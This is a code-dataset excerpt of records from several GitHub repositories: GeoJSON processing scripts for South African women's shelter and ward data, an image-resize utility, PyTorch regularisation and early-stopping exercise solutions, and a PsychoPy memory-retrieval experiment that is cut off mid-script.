"alpha_fraction": 0.6494662165641785,
"alphanum_fraction": 0.6536180377006531,
"avg_line_length": 31.288461685180664,
"blob_id": "fca85d96b7e6901bd8979ead96ec4fbac9d8ce9e",
"content_id": "0f804626d696af788354ff3c0496122f405f45ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 52,
"path": "/automate.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\"\"\"\n automate\n <arbitrary>\n topojson\n gzip\n\"\"\"\nimport subprocess\nimport geoJsonAddPropName\nimport geoJsonChgPropName\nimport geoJsonDelPropName\n\nDST_DIR = '/home/swannsg/development/womansSheleterPy/data/geoJson'\nPROVINCES = ['EC', 'FS', 'KN', 'LIM', 'MP', 'NC', 'NW', 'WC']\nPROVINCES = ['WC']\n\n# CONFIG: add, chg, del feature properties as required\ngeoJsonAddPropName.PKL = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/female18-120.pkl'\ngeoJsonChgPropName.CHANGE_PROP_NAME = []\ngeoJsonDelPropName.DEL = []\n\n\nfor province in PROVINCES:\n fn_in = DST_DIR + '/' + province + '/merge/' + province + 'merged.geojson'\n fn_temp = DST_DIR + '/' + province + '/merge/' + province + 'merged.geojson' + '.bak'\n # backup the file\n subprocess.call(['cp', fn_in, fn_temp])\n print ('working with', fn_temp) \n\n \"\"\"\n # add, chg, del feature properties as required\n geoJsonChgPropName.SRC_FILE = fn_temp\n geoJsonDelPropName.SRC_FILE = fn_temp\n geoJsonAddPropName.SRC_FILE = fn_temp\n print ('chg properties')\n geoJsonChgPropName.chg()\n print ('delete properties')\n geoJsonDelPropName.delete()\n print ('add properties')\n geoJsonAddPropName.add()\n # end add, chg, del feature properties as required\n\n # topojson\n print ('topojson')\n subprocess.call(['rm', fn_temp + '.topojson'])\n cmd = 'geo2topo ' + fn_temp + ' > ' + fn_temp + '.topojson'\n print(subprocess.run(cmd, stdout=subprocess.PIPE, shell=True))\n \"\"\"\n \n # gzip\n subprocess.run(['rm', fn_temp + '.topojson.zip'])\n subprocess.run(['zip', fn_temp + '.topojson.zip', fn_temp + '.topojson'])\n\n\n \n"
},
{
"alpha_fraction": 0.5944244861602783,
"alphanum_fraction": 0.5953237414360046,
"avg_line_length": 26.09756088256836,
"blob_id": "8f713ee40d3a83ae6b109c659396a338a172fe64",
"content_id": "8478f31733f325f547bf739507c9c423525f51c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1112,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 41,
"path": "/sheltersCSVtoGeoJson.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n shelters.csv to geoJson\n\"\"\"\nimport pprint\nimport json\n\nCSV = '/home/swannsg/development/womansSheleterPy/data/sheltersFromKirsty/Western Cape Shelters GPS coordinates.csv'\nOUT = '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/shelters/WCshelters.geojson'\n\nresult= {}\nresult['type'] = 'FeatureCollection'\nresult['name'] = 'WC Shelters'\nresult['features'] = []\n\n\nfp = open(CSV, 'r')\n\nfor i, each in enumerate(fp):\n if i == 0:\n # ignore first line\n continue\n each.replace('\\n', '')\n area, name, lat, lng, num = each.split(',')\n # init feature\n feature = {'type':'Feature',\n 'geometry': {'coordinates': [], \"type\": 'Point'},\n 'properties': {'area': '', 'name': ''}}\n\n # set values in feature\n feature['geometry']['coordinates'] = [float(lng.replace('\"', '')),\n float(lat.replace('\"', ''))]\n feature['properties']['area'] = area\n feature['properties']['name'] = name\n\n # add to features\n result['features'].append(feature)\nfp.close()\n\nfp = open(OUT, 'w')\njson.dump(result, fp)\nfp.close()\n\n"
},
{
"alpha_fraction": 0.6723891496658325,
"alphanum_fraction": 0.6723891496658325,
"avg_line_length": 20.84375,
"blob_id": "d7343b4b97c466df76ebe7377e23c84fd7a2082d",
"content_id": "3c4af9002c196bda2e4c36ffe9d1db2d8a302c56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 699,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 32,
"path": "/mapWardIdtoMunicipalName.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n map wardId to municipality name\n\n input file: any ward geojson file\n\"\"\"\n\nimport json\nimport pickle\nimport pprint\n\nSRC_FILE = '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/merge/WCmerged.geojson'\nPICKLE_FILE = '/home/swannsg/development/womansSheleterPy/data/sundryStuff/wardId_munName.pkl' \n\nfp = open(SRC_FILE, 'r')\nx = json.load(fp)\nfp.close()\n\nfp = open(PICKLE_FILE, 'rb')\nresult = pickle.load(fp)\nfp.close()\n\nfor each in x['features']:\n result[each['properties']['WardID']] = [ \n each['properties']['Province'],\n each['properties']['MunicName'],\n ]\n\nfp = open(PICKLE_FILE, 'wb')\npickle.dump(result,fp)\nfp.close()\n\n# pprint.pprint(result)\n"
},
{
"alpha_fraction": 0.6394293308258057,
"alphanum_fraction": 0.6398616433143616,
"avg_line_length": 30.616437911987305,
"blob_id": "a0d8f07ddae27a200faba06877a70cba729c3b6b",
"content_id": "3a39d3730dbe285cec182ef42b623ab39bd19ee2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2313,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 73,
"path": "/multiFilesKmlToJson.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n convert multiple kml files to geojson format\n PROVINCE: set to the province eg. WC\n FILES_TO_IGNORE: files in SRC_DIR that should not be converted \n SRC_DIR: contains multiple kml files\n DST_DIR: where kml to geojson result files are placed\n\"\"\"\nimport os\nimport kmlToJson\nimport mergeGeoJsonFiles\n\n# edit to process a province\nPROVINCE = 'NW'\nFILES_TO_IGNORE = ['EC.kml', 'FS.kml', 'KZN.kml', 'LIM.kml',\n 'MP.kml', 'NC.kml', 'NW.kml', 'WC.kml', 'KZN_KML_Files.zip']\n# end edit to process a province\n\n# edit for global dirs\nSRC_DIR = '/home/swannsg/development/womansSheleterPy/data/kml'\nDST_DIR = '/home/swannsg/development/womansSheleterPy/data/geoJson'\nKML_TO_GEOJSON = True\nMERGE_FILES = True\n# end edit for global dirs\n\nsrc_dir = SRC_DIR + '/' + PROVINCE\ndst_dir = DST_DIR + '/' + PROVINCE\n\n# create dirs if they don't exist\nif not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n# end create dirs if they don't exist\n\n# get files and dirs in SRC_DIR\nfiles_dirs = os.listdir(src_dir)\n\n# remove names that are dirs from files_dirs\nfor each in files_dirs:\n if not os.path.isfile(src_dir + '/' + each):\n files_dirs.remove(each)\n\n# remove filenames that are NOT to be processed\nfor each in files_dirs:\n try:\n if FILES_TO_IGNORE.index(each) >= 0:\n # filename must be removed\n files_dirs.remove(each)\n except:\n pass\n \n# map kml files to geoJson\nif KML_TO_GEOJSON:\n for each in files_dirs:\n print (src_dir + '/' + each, dst_dir)\n kmlToJson.runKmlToJson(src_dir + '/' + each, dst_dir)\n# end map kml files to geoJson\n\n# merge geoJson files\nif MERGE_FILES:\n # ---get files and dirs in dst_dir\n files_dirs = os.listdir(dst_dir)\n # --remove names that are dirs from files_dirs\n for each in files_dirs:\n if not os.path.isfile(dst_dir + '/' + each):\n files_dirs.remove(each)\n\n # create dirs if they don't exist\n if not os.path.exists(DST_DIR + '/' + PROVINCE + '/merge'):\n os.makedirs(DST_DIR + '/' + PROVINCE + '/merge')\n # end create dirs if they don't exist\n\n mergeGeoJsonFiles.mergeGeoJsonFiles([dst_dir + '/' + a for a in files_dirs],\n dst_dir + '/merge/' + PROVINCE + 'merged.geojson')\n# end merge geoJson files\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5869565010070801,
"alphanum_fraction": 0.6166008114814758,
"avg_line_length": 26.189189910888672,
"blob_id": "86faab83eb620c405c414b31e57f164a6c76978b",
"content_id": "d50e5fb1897bf95ac7341cf067ef6f4cf65cf1cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1012,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 37,
"path": "/csvFem18-120.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Statistics South Africa\r\n Descriptive_Electoral_Wards\r\n Table 1\r\n Geography by Gender\r\n \" for Person weighted, 18 - 120\"\r\n ,\"Male\",\"Female\",\"Grand Total\"\r\n\n Females 18 to 120\n\n output = {wardID: {f18-120: <number>}}\n result is pickled\n\"\"\"\nimport pickle\nfilename = \"/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/sourceData/Whole of SA women's population 18 and upwards - most detailed with codes no names.csv\"\npkl = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/female18-120.pkl'\nresult = {}\nstart = False\nfp = open(filename, 'r')\ni = 0\nfor each in fp:\n # print (i)\n if each == ',\"Male\",\"Female\",\"Grand Total\"\\n':\n start = True\n continue\n if start:\n a,b,c,d = each.split(',')\n if a == '\"Grand Total\"':\n break\n a = a.replace('\"', '')\n result[a.split(':')[0]] = {'f18-20': int(c)}\n i = i + 1\n\nfp.close()\nfp = open(pkl, 'wb')\npickle.dump(result, fp)\nfp.close()\n"
},
{
"alpha_fraction": 0.6152671575546265,
"alphanum_fraction": 0.6183205842971802,
"avg_line_length": 19.46875,
"blob_id": "cf2acb5df89638fdea05d22be20d3e892fd8bbc6",
"content_id": "a28cea1b18a9d13fcaeb58619ac581fcbebcab0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 32,
"path": "/geoJsonDelPropName.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n geoJsonDelPropName.py\n\n feature.properties = {key_1: value_1, ...}\n Delete key_N from feature.properties\n\"\"\"\n\nimport json\nimport pickle\nimport pprint\n\nSRC_FILE = '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/merge/WCmergedTest.geojson'\nDEL = ['females']\n\ndef delete():\n fp = open(SRC_FILE, 'r')\n x = json.load(fp)\n fp.close()\n\n\n # del properties\n for feature in x['features']:\n for each in DEL:\n feature['properties'].pop(each, None)\n\n # show result\n #for each in x['features']:\n # pprint.pprint(each['properties'])\n\n fp = open(SRC_FILE, 'w')\n json.dump(x, fp)\n fp.close()\n"
}
] | 14 |
myportfolio-tech/sotl | https://github.com/myportfolio-tech/sotl | 05bae64d000cb8a9eb36bcaf563cb164bd92a6ac | 5e26814458b04a1c8822720d976a81b12bc15e5b | 8840d33937df7b7c6f7762d05efe24931147dec3 | refs/heads/master | 2023-01-11T18:53:51.901699 | 2020-10-31T20:08:09 | 2020-10-31T20:08:09 | 298,919,173 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7369726896286011,
"avg_line_length": 21.38888931274414,
"blob_id": "f1f809526675db0db4060e6a048e2ac3585fe5fc",
"content_id": "eab95e5cea0367754868d7e79986e39b9a0bf579",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 403,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 18,
"path": "/python/image-resize.py",
"repo_name": "myportfolio-tech/sotl",
"src_encoding": "UTF-8",
"text": "import os\nimport cv2\n\nos.chdir('D:/sotl/images')\nimg1 = cv2.imread('headphones.jpg')\n\nscale_percent = 0.08\nwidth = int(img1.shape[1]* scale_percent)\nheight = int(img1.shape[0]* scale_percent)\n\ndimension = (width, height)\n\nresize = cv2.resize(img1, dimension, interpolation=cv2.INTER_AREA)\n\ncv2.imshow('Test', resize)\ncv2.imwrite('headphones-smallest.jpg', resize)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6582661271095276,
"avg_line_length": 20.565217971801758,
"blob_id": "1dd941cbc4f5894021fd0107de5576f2f371ad24",
"content_id": "d61de18e8bf07a331754327dbedc72fa0231a24a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 992,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 46,
"path": "/python/image-resize_batch.py",
"repo_name": "myportfolio-tech/sotl",
"src_encoding": "UTF-8",
"text": "import os\nimport cv2\n\nos.chdir('D:/sotl/images_repo')\nimages_path = 'D:/sotl/images_repo'\n\nc = 1\n\ndef calculate_image_sizes (shape):\n width = 150\n height = int(150 * shape[1] / shape[0])\n\n return width, height \n\n\n\n\nfor _file in os.listdir(images_path):\n full_path = os.path.join(images_path, _file)\n print(full_path)\n img = cv2.imread(full_path)\n\n width, height = calculate_image_sizes (img.shape)\n file_name = 'file-0' + str(c) + '.jpg'\n dimension = (width, height)\n \n resize = cv2.resize(img, dimension, interpolation=cv2.INTER_AREA)\n cv2.imwrite(file_name, resize)\n\n c += 1\n\n\n# img1 = cv2.imread('headphones.jpg')\n\n# scale_percent = 0.08\n# width = int(img1.shape[1]* scale_percent)\n# height = int(img1.shape[0]* scale_percent)\n\n# dimension = (width, height)\n\n# resize = cv2.resize(img1, dimension, interpolation=cv2.INTER_AREA)\n\n# cv2.imshow('Test', resize)\n# cv2.imwrite('headphones-smallest.jpg', resize)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n"
},
{
"alpha_fraction": 0.7525773048400879,
"alphanum_fraction": 0.7525773048400879,
"avg_line_length": 18.399999618530273,
"blob_id": "18f094f2d83b8e079182c123092bbc6787e43602",
"content_id": "e975465f964529f17f50ef5b39783958bd1da5ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 97,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/README.md",
"repo_name": "myportfolio-tech/sotl",
"src_encoding": "UTF-8",
"text": "# sotl\nUdacity Front End - Blog\n\nThe site resides here:\nhttps://myportfolio-tech.github.io/sotl/\n"
}
] | 3 |
damianpetroff/ArtificialIntelligenceTP | https://github.com/damianpetroff/ArtificialIntelligenceTP | 6aeeebae7a8340eee823b8e2da1ab0f6158494c0 | 575b4f232b359b993bafdc7efb85f529d2cb70f5 | fac7ea5f134b883376fd8be12270fcdeadddc921 | refs/heads/master | 2020-04-02T06:06:57.316748 | 2018-11-11T19:47:39 | 2018-11-11T19:47:39 | 154,129,782 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.556900143623352,
"alphanum_fraction": 0.5678380131721497,
"avg_line_length": 28.224489212036133,
"blob_id": "05928816a5c6cfc94c37f78d08f8e63062ceb91e",
"content_id": "2cc36449a096d68a281b66f08f565bf11042bd99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4298,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 147,
"path": "/TPAstar/TP.py",
"repo_name": "damianpetroff/ArtificialIntelligenceTP",
"src_encoding": "UTF-8",
"text": "\ncities = []\n\nclass City:\n def __init__(self, name, x, y):\n self.name = name\n self.x = x\n self.y = y\n self.neighbors = {}\n self.parent = None\n self.fn = 0\n self.gn = 0\n self.hn = None\n\n def __str__(self):\n return f\"{self.name} ({self.x},{self.y}), {len(self.neighbors)} neighbors\"\n\n def addNeighbor(self, city, weight):\n self.neighbors[city] = weight\n\n def dumpNeighbors(self):\n for k,v in self.neighbors.items():\n print(f\"neighbor:{k}, weight:{v}\")\n\ndef readFiles():\n import re\n #Read positions file\n with open(\"data/positions.txt\", \"r\") as file:\n for position in file.readlines():\n p = re.sub('\\n', '', position).split(' ')\n cities.append(City(p[0], int(p[1]), int(p[2])))\n\n #Read connections file\n with open(\"data/connections.txt\", \"r\") as file:\n for connection in file.readlines():\n c = re.sub('\\n', '', connection).split(' ')\n getCityFromName(c[0]).addNeighbor(getCityFromName(c[1]), int(c[2]))\n getCityFromName(c[1]).addNeighbor(getCityFromName(c[0]), int(c[2]))\n\ndef getCityFromName(name):\n for city in cities:\n if city.name == name:\n return city\n return 0\n\ndef getCityFromInput(s):\n city = None\n st = \"\\nEnter \"+s+\" city : \"\n while(city not in cities):\n cityName = input(st).capitalize()\n city = getCityFromName(cityName)\n return city\n\ndef AStar(initialCity, destinationCity, h):\n history = []\n currentCity = None\n frontiere = [initialCity]\n initialCity.gn = 0\n\n while len(frontiere) > 0 :\n frontiere = sorted(frontiere, key=lambda city: city.fn)\n currentCity = frontiere.pop(0)\n\n if currentCity == destinationCity:\n return (getPath(currentCity), len(history), currentCity.gn)\n\n history.append(currentCity)\n\n for city, weigth in currentCity.neighbors.items():\n if city not in history:\n gn = weigth + currentCity.gn\n hn = h(city, destinationCity)\n fn = gn + hn\n if city.hn is None:\n city.hn = hn\n\n if city not in frontiere:\n frontiere.append(city)\n elif gn >= city.gn:\n continue\n\n city.parent = currentCity\n city.gn = gn\n city.fn = fn\n return (None, len(history), 0)\n\ndef getPath(city):\n path = [city]\n currentCity = city.parent\n while currentCity is not None:\n path.append(currentCity)\n currentCity = currentCity.parent\n path.reverse()\n return path\n\ndef pathToString(path):\n stringPath = path[0].name\n for city in path[1::]:\n stringPath += \" -> \" + city.name\n return stringPath\n\n# Heuristiques\ndef h0(n, B):\n '''0'''\n return 0\ndef h1(n, B):\n '''la distance entre n et B sur l'axe x'''\n return abs(n.x - B.x)\ndef h2(n, B):\n '''la distance entre n et B sur l'axe y'''\n return abs(n.y - B.y)\ndef h3(n, B):\n '''la distance à vol d'oiseau entre n et B'''\n return (pow(h1(n,B), 2) + pow(h2(n,B), 2)) ** 0.5\ndef h4(n, B):\n '''la distance de Manhattan entre n et B'''\n return h1(n, B)+h2(n, B)\n\nif __name__ == \"__main__\":\n import sys\n heuristiques = [h0, h1, h2, h3, h4]\n readFiles()\n\n #Initial City\n if len(sys.argv) > 1:\n initialCityName = sys.argv[1].capitalize()\n initialCity = getCityFromName(initialCityName)\n else:\n initialCity = getCityFromInput(\"initial\")\n print(f\"Initial city city set to {initialCity.name} ({initialCity.x},{initialCity.y})\")\n\n #Destination City\n if len(sys.argv) > 2:\n destinationCityName = sys.argv[2].capitalize()\n destinationCity = getCityFromName(destinationCityName)\n else:\n destinationCity = getCityFromInput(\"destination\")\n print(f\"Destination city set to {destinationCity.name} ({destinationCity.x},{destinationCity.y})\")\n\n #A\n i=0\n for hi in heuristiques:\n print(\"\\nHeuristic : \", i)\n path = AStar(initialCity, destinationCity, hi)\n print(\"Path :\", pathToString(path[0]))\n print(\"Number of visited cities :\", path[1])\n print(\"Path weight :\", path[2])\n i+=1\n"
},
{
"alpha_fraction": 0.7706093192100525,
"alphanum_fraction": 0.7885304689407349,
"avg_line_length": 33.875,
"blob_id": "0edbefe087fa8c9c2a619ba9fac65a4ced23bf19",
"content_id": "5bd30ac04c2094ffae932ad63731fdcd40505a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 288,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 8,
"path": "/README.md",
"repo_name": "damianpetroff/ArtificialIntelligenceTP",
"src_encoding": "UTF-8",
"text": "# ArtificialIntelligenceTP\n\n## Critère d'évaluation\n1. L'algorithme est compris et implémenté correctement (fonctionnel)\n2. Réponses aux questions\n3. Qualité du code\n 1. Code Python bien structuré, etc.\n 2. IHM (pas nécessairement graphique): Facilité de tester votre solution\n"
},
{
"alpha_fraction": 0.7298578023910522,
"alphanum_fraction": 0.7393364906311035,
"avg_line_length": 34.16666793823242,
"blob_id": "0839a0a251aa4da6be5db03e8b17e788ad35e03b",
"content_id": "350af5ad566665ee5b9b964c552d1a1bb39d59f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 12,
"path": "/TPAstar/README.md",
"repo_name": "damianpetroff/ArtificialIntelligenceTP",
"src_encoding": "UTF-8",
"text": "#### Utilisation\n1. Lancer TP.py\n2. Entrer le nom de la ville de départ (exemple: \"Lisbon\")\n3. Entrer le nom de la ville de destination (exemple: \"beRlIn\" -> case non-sensitive) \n4. Observation des résultats\n\nAlternative :\nPossible de lancer le programme avec les villes en commentaire : (exemple : `>python TP.py Lisbon beRlIn`)\n\n\n#### Questions TP\nLes réponses aux questions du TP sont dans le notebook \"TP Astar.ipynb\"\n"
}
] | 3 |
rescallier/tradeoff-bias-and-variance | https://github.com/rescallier/tradeoff-bias-and-variance | 1bf9b493a98c4cadf04fd6d249f37ad689152bc9 | 03f4331a4c779e5cbe3f51271f0eaa2b38a84478 | af33343a48ba3cb354979cd7f3d51de8e6d498c1 | refs/heads/master | 2021-01-06T17:31:46.874869 | 2020-02-18T17:01:00 | 2020-02-18T17:01:00 | 241,418,426 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7569988965988159,
"alphanum_fraction": 0.7648376226425171,
"avg_line_length": 48.66666793823242,
"blob_id": "6dddea42e1a6e278b2cc6bb52f2a7189ffea235c",
"content_id": "563ff931632a42568aa753d2544246f65ee1be21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 893,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 18,
"path": "/solutions/regularization.py",
"repo_name": "rescallier/tradeoff-bias-and-variance",
"src_encoding": "UTF-8",
"text": "torch.manual_seed(0)\nlambda_ = 0.005\ncnn_regularization = CNN()\n# CrossEntropyLoss as loss because of no softmax in the last layer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(cnn_regularization.parameters(),\n lr=learning_rate,weight_decay=lambda_)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n## To train the model uncomment lines below, \n#train(cnn_regularization,train_loader,num_epochs,optimizer,criterion)\n#torch.save(cnn_regularization, 'models/regularisation.pt')\n\n# Load trained model that was train using the code above using a gpu on google colab during 30 epochs\ncnn_regularization = torch.load('models/regularisation.pt')\ncnn_regularization.eval()\naccuracy_train_regularization = accuracy(cnn_regularization,train_loader,'train')\naccuracy_test_regularization = accuracy(cnn_regularization,test_loader,'test')"
},
{
"alpha_fraction": 0.4195804297924042,
"alphanum_fraction": 0.45104894042015076,
"avg_line_length": 21.076923370361328,
"blob_id": "602c30c63529c74ca68b1e0e8108f83953ee593d",
"content_id": "024c3f3516cbb24d3cc06fb98475f94bd9dae719",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 13,
"path": "/solutions/linear_model.py",
"repo_name": "rescallier/tradeoff-bias-and-variance",
"src_encoding": "UTF-8",
"text": "class CNN(nn.Module):\n '''\n Define the model \n '''\n def __init__(self):\n super(CNN, self).__init__()\n \n self.fc = nn.Linear(28*28*1, 10)\n \n def forward(self, x):\n out = x.view(x.size(0), -1)\n out = self.fc(out)\n return out"
},
{
"alpha_fraction": 0.5637860298156738,
"alphanum_fraction": 0.5696648955345154,
"avg_line_length": 39.30952453613281,
"blob_id": "9f304f179151354daa6bc976824f1a23b6d919ff",
"content_id": "586724cd483fdaacfe0741af923c730ca63a34fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1701,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 42,
"path": "/solutions/earlystopping.py",
"repo_name": "rescallier/tradeoff-bias-and-variance",
"src_encoding": "UTF-8",
"text": "def train(cnn,train_loader,num_epochs,optimizer,criterion,validloader,patience):\n '''\n Train the model\n -------\n \n Param:\n cnn : torch.nn.module, model to train\n train_loader : torch.utils.data.DataLoader, loader with the data to train the model on\n num_epochs : int, number of epoch \n optimizer : torch.optim, optimizer to use during the training\n criterion: torch.nn, loss function used here,\n validloader: torch.utils.data.DataLoader, loader with the data to validate the model on\n patience: int, number of epoch to wait with an higher loss before stopping the algorithm\n '''\n losses = []\n validlosses = []\n estop = EarlyStopping(patience=patience)\n for epoch in range(num_epochs):\n for i, (images, labels) in enumerate(train_loader): \n \n images = Variable(images.float())\n labels = Variable(labels)\n\n # Forward + Backward + Optimize\n optimizer.zero_grad()\n outputs = cnn(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n \n losses.append(loss.data);\n \n if (i+1) % 100 == 0:\n print ('Epoch : %d/%d, Iter : %d/%d, Loss: %.4f' \n %(epoch+1, num_epochs, i+1, len(train_dataset)//batch_size, loss.detach().numpy()))\n valid_loss = validation(cnn,validloader,criterion)\n validlosses.append(valid_loss)\n estop.step(valid_loss)\n print ('Valid Loss, Epoch : %d/%d, Loss: %.4f' \n %(epoch+1, num_epochs, valid_loss))\n if estop.early_stop:\n break "
}
] | 3 |
maheen/gablab-psychopy-tasks | https://github.com/maheen/gablab-psychopy-tasks | aa68fa3f2f2cee44954572531d9faa40eda77a4d | f6cd0ee3a2a152bd194c4b5ef042c9d1fc040938 | 3e02dc98e6c168b76f302682ddd3b99506e361d0 | refs/heads/master | 2020-03-31T01:24:20.008010 | 2018-10-05T21:49:12 | 2018-10-05T21:49:12 | 151,779,788 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.675146222114563,
"alphanum_fraction": 0.6921783685684204,
"avg_line_length": 41.22222137451172,
"blob_id": "10aee96cf38ff0040b0b5e27f32645eb6388da49",
"content_id": "55159a65ff5ac7955f643505703443d42388c8aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13680,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 324,
"path": "/GML_retrieval.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Mon Jul 30 11:05:40 2012\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle\nfrom random import seed, shuffle\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='None'#from the Builder filename that created this script\nexpInfo={'participant':'', 'session':'001'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_ret_%s' %(expInfo['participant'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=True,\n dataFileName=filename)\n\ndatFile=open('data' + os.path.sep + '%s_%s.txt' %(expInfo['participant'], expInfo['date']),'w')\ndatFile.write('Trial\\tStim\\tOldvsNew\\tResp\\tRT\\tAcc\\tHit\\tMiss\\tFA\\tCR\\n')\n\n\n#setup the Window\nwin = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'black', colorSpace=u'rgb')\n\n#Initialise components for Routine \"instr\"\ninstrClock=core.Clock()\ninstructions=visual.TextStim(win=win, ori=0, name='instructions',\n text=u\"Press '1' if the image is old, press '2' if the image is familiar, and press '3' if the image is new. Press the 'return' key to begin.\",\n font=u'Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for Routine \"trial\"\ntrialClock=core.Clock()\ntext=visual.TextStim(win=win, ori=0, name='text',\n text=u'old=1 familiar=2 new=3',\n font=u'Arial',\n pos=[0, -0.5], height=0.1,wrapWidth=None,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-1.0)\nimage=visual.ImageStim(win=win, name='image',units=u'pix',\n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-2.0)\n\n# Create some handy timers\nglobalClock=core.Clock() #to track the time since experiment started\nroutineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine\"instr\"-------\nt=0; instrClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\nkey_start = event.BuilderKeyResponse() #create an object of type KeyResponse\nkey_start.status=NOT_STARTED\n#keep track of which components have finished\ninstrComponents=[]\ninstrComponents.append(instructions)\ninstrComponents.append(key_start)\nfor thisComponent in instrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine 